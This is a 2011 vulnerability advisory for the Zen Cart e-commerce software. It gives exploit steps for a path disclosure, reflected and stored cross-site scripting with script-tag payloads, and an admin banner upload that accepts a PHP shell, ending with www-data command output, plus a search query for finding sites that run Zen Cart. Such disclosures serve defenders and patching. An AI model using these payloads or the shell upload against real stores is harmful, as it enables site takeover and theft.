[*]Multiple Vulnerabilities in Zen Cart
[*][ Vendor SW ]=> Zen Cart - http://www.zen-cart.com
[*][ Version ]=> 1.3.9f, 1.3.9h (but possible all versions)
[*][ Vendor URL]=> www.zen-cart.com
[*][ Tested on ]=> BackTrack 4
[*][ Category]=> WebApps/0day
[*][ Date]=> 18 May 2011 - (0day from 28 Sep 2010)
[*][ Author]=> Dr. Alberto Fontanella
[*][ Author WEB]=> ictsec.wordpress.com
[*][ Author E-Mail ]=> itsicurezza<0x40>yahoo.it
[*][ Popularity]=> intext:"Powered by Zen Cart"
[*]206.000.000 hits
[-] [ INFO ]
An error occurs when an attacker points a single page.
This leads to discover the full path of web server and vhost directory.
[-] [ EXPLOIT ]
Fatal error: Call to undefined function zen_href_link() in
/var/www/includes/languages/english.php on line 16
[-] [ INFO ]
This Issue has *not* been found into last tested version (1.3.9h) but
into all others versions. The "Quantity" field of Store Product don't
sanitizes user input before to show output back to user. This leads an
attacker to inject and execute arbitrary javascript and/or html code.
[-] [ EXPLOIT ]
http://[host]/index.php?main_page=shopping_cart (OR)
Your Shopping Cart Contents =>
Qty: "><script>alert("XSS")</script>
Click on "Change your Quantity" refresh button.
[-] [ INFO ]
You have to be logged as Admin. The "Zones Name & Code" fields of
Locations/Taxes don't sanitizes user input before to store it into
database and to show output back to user. This leads an attacker to
inject and execute arbitrary javascript and/or html code.
[-] [ EXPLOIT ]
http://[host]/[admin]/zones.php?page=1&action=new (OR)
Locations/Taxes => Zones
Zones Name: "><script>alert("XSS")</script>
Zones Code: "><script>alert("XSS")</script>
So, you inject evil code that can not be deleted. (">) destroy the
page structure so the Admin have to work directly on database
(phpmyadmin, etc.) to restore it and delete evil code.
...etc, others Stored XSS are presents on admin console.
[-] [ INFO ]
Banner Manager don't check the extension/type of image to upload.
This leads an attacker that have administrative privileges to
upload arbitrary files on server (ie. backdoors, php shells, etc.)
[-] [ EXPLOIT ]
http://[host]/[admin]/banner_manager.php?action=new (OR)
Tools => Banner Manager => New Banner => Image: phpShell.php
The uploaded file will be located into:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[ EOF ]
Please feel free to write me a bit if you want some information or
a professional consultancy.